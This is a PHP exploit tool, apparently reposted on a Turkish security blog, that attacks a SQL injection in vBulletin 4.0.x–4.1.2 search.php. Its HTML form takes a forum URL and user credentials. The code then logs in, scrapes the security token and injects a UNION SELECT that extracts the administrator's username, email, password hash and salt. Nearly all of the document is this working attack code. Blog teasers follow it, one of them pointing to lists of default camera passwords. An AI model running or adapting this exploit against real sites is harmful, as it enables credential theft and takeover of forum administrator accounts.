<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
888 888 888
888 888 888
888 888 888
.d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888
d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888
888 888 888 888 888 88888888 888 888 888 888 888 888
Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888
"Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888
888
Y8b d88P
"Y88P"
8888888b. d8888 888888b. .d8888b. .d88888b. 888 888 888b 888
888 Y88b d88888 888 "88b d88P Y88b d88P" "Y88b 888 888 8888b 888
888 888 d88P888 888 .88P .d88P 888 888 888 888 88888b 888
888 d88P d88P 888 8888888K. 8888" 888 888 888 888 888Y88b 888
8888888P" d88P 888 888 "Y88b "Y8b. 888 888 888 888 888 Y88b888
888 T88b d88P 888 888 888 888 888 888 888 888 888 888 Y88888
888 T88b d8888888888 888 d88P Y88b d88P Y88b. .d88P Y88b. .d88P 888 Y8888
888 T88b d88P 888 8888888P" "Y8888P" "Y88888P" "Y88888P" 888 Y888
mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>
<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text' size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>
<?
if($_POST['form_action'] == 1 )
{
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];
$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
$md5Pass = md5($pass);
$data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
// curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$url2= trim(myf($store,"Location:","Content-Length:"));
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url2);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");
//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>
Kaydol:
Kayıtlar (Atom)
For other brands usernames and passwords please see below:
Camera Manufacturer Username Password Default IP 3xLogic admin 12345 192.0.0.64 ACTI Admin or admin 1...
-
Decimal-Binary-Hexadecimal Conversion Chart This chart shows all of the combinations of decimal, binary and hexadecimal from 0 to 25 5 decim...
-
Ürün ve araçlar Aşağıdaki listede web uygulama güvenlik tarayıcısı işlevsellik sağlamak. Web uygulama güvenliği tarama işlevleri burada list...
-
Hazır Sistemler İçin En İyi Robots.txt Dosyaları 14 Derlediğim robots.txt dosyaları hazır sistemler içindir ve emin olabilirsiniz ki alanı...